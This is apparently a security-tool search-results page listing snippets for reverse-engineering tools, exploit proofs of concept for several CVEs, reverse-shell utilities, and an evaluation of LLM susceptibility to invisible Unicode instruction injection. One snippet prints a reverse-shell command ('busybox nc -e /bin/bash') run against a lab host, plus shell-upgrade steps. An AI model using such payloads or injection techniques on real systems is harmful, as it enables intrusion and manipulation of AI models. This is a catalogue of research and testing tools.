8634 matches found
Reverse-Engineering
A FREE comprehensive reverse engineering tutorial covering x86, x64, 32-bit/64-bit ARM, 8-bit AVR and 32-bit RISC-V architectures. FREE EMBEDDED HACKING COURSE PROMO HERE Join DC540 Discord HERE OUROBOROS BADGE HERE HOW IT WORKS HERE CLICK IMAGE BELOW TO WATCH THE PROMO VIDEO! Today's Tutorial Ju...
ghidra_kernelcache
ghidrakernelcache: a Ghidra iOS kernelcache framework for reverse engineering This framework is the end product of my experience in Kernelcache reverse engineering , I usually look for vulnerabilities by manually auditing the kernel and its extensions and have automated most of the things that I...
SmileySploit
SmileySploit A basic script that exploits CVE-2011-2523 Overview In 2011, an integrated backdoor was found on vsFTPd servers running version 2.3.4, in which using a smiley emoticon ":" triggers a reverse connection to an attacker. With this, it is extremely easy to create an exploit script and ga...
CVE-2023-38831_Exploit
CVE-2023-38831 Exploit Proof-of-Concept Overview This repository contains a Python script that demonstrates a proof-of-concept PoC exploit for CVE-2023-38831. This exploit leverages a vulnerability in specific file-processing mechanisms to execute a reverse shell payload through a malicious RAR...
CVE-2021-44228
CVE-2021-44228 Log4Shell Proof of Concept CVE-2021-44228 Make sure to use Java 8 JDK. Java 8 Download Images Credits Casey Dunham - Java Reverse Shell kozmer - Initial PoC Legal The author of this script does NOT take any responsibility of how this piece of code is used! This was created solely...
CVE-2025-24893
Reverse shell for CVE-2025-24893 root@kitploit: python3 CVE-2025-24893.py -u http://wiki.editor.htb/ -c "busybox nc -e /bin/bash" upgrade the shell 1. python3 -c 'import pty; pty.spawn"/bin/bash"' 2. ctrl + z 3. stty size 4. stty raw -echo; fg 5. stty rows x columns y 6. export TERM=xterm...
Vision-MSI-Thermal-Control
Vision MSI Thermal Control MSI Modern 15H AI C1MG-096IT Linux thermal management - Reverse engineered EC control with fan profiles and battery threshold ๐ฏ Purpose of this Project This application was born out of necessity for MSI laptop users on Linux. The journey began when I discovered that...
NotaMy
๐ฌ๐ง Inglese| ๐ฎ๐น Italiano ---|--- ๐ง NotaMy NotaMy is a hierarchical terminal-based technical note manager designed to reduce the mental cost of context switching for those working on long-term analysis tasks pentesting, reverse engineering, wargames. ๐ฏ Why NotaMy Was Created When I started working on...
ctf-skills
ctf-skills Agent Skills para resolver desafรญos CTF โ explotaciรณn web, binary pwn, criptografรญa, ingenierรญa inversa, forense, OSINT, y mรกs. Funciona con cualquier herramienta que admita la especificaciรณn Agent Skills, incluido Claude Code. Instalaciรณnbash npx skills add ljagiello/ctf-skills...
exploitation-course
OFFENSIVE SECURITY & REVERSE ENGINEERING OSRE Course This repository is for the Offensive Security and Reverse Engineering Offensive Software Exploitation Course I used to teaching at Champlain College and currently sharing it for free online check the YouTube channel for the recordings. Most of...
Elfina
Elfina: A Multi-Architecture ELF Loader Elfina is a multi-architecture ELF loader supporting x86 and x86-64 binaries. This project has been implemented in Rust since v2.0.0. Background Recently, I have been studying reverse engineering on Windows and the PE file format. After that, I started...
Flutter-Reverse-Engineering-Labs
Flutter Reverse Engineering Labs This repository contains a series of progressive challenges designed to introduce the reverse engineering of Flutter applications. Since there aren't many blog posts or tutorials that explain Flutter reversing in detail, I decided to create this repo as a hands-on...
filtron
Filtron Reverse HTTP proxy to filter requests by different rules. Can be used between production webserver and the application server to prevent abuse of the application backend. The original purpose of this program was to defend searx, but it can be used to guard any web application. Installatio...
rathole
rathole English | ็ฎไฝไธญๆ A secure, stable and high-performance reverse proxy for NAT traversal, written in Rust...
reverse-captcha-eval
Reverse CAPTCHA: Evaluating LLM Susceptibility to Invisible Unicode Instruction Injection An evaluation framework that tests whether large language models follow invisible Unicode-encoded instructions embedded in otherwise normal-looking text. Where traditional CAPTCHAs exploit tasks humans can...
serval
A Netcat style backdoor for pentesting and pentest challenges Serval is a lightweight, easy-to-use, binary for spawning reverse and bind shells for pentests or pentesting exercises. Serval is cross platform and can be compiled for both Windows 32 & 64-bit and Linux 32 and 64-bit. Note: Due to the...
B2R2
B2R2 B2R2 is a fully managed binary analysis framework written in F. It provides a rich set of algorithms, functions, and tools for reverse engineering, program analysis, and binary-level inspection. The name B2R2 takes inspiration from R2-D2, the iconic robot from Star Wars. Originally named B2-...
secbutler
Essential utilities for pentester, bug-bounty hunters and security researchers Features โข Usage โข Installation โข License โข secbutler is a utility tool made for pentesters , bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing...
hoaxshell
hoaxshell โก The latest version of this project is the HoaxShell standalone listener which comes with refreshed payload templates. Wou can also use it directly from https://revshells.com make sure to choose hoaxshell as the listener. โ ๏ธ As of 2022-10-18, hoaxshell is detected by AMSI...
cve-2022-22947
CVE-2022-22947 Poc for CVE-2022-22947 DnsLog When I was writing the PoC for xray, the reverse couldn't receive DNS requests. After debugging for a long time, I decided to write a Python version of the PoCโฆโฆ root@kitploit: python3 poc-cve-2022-22947.py...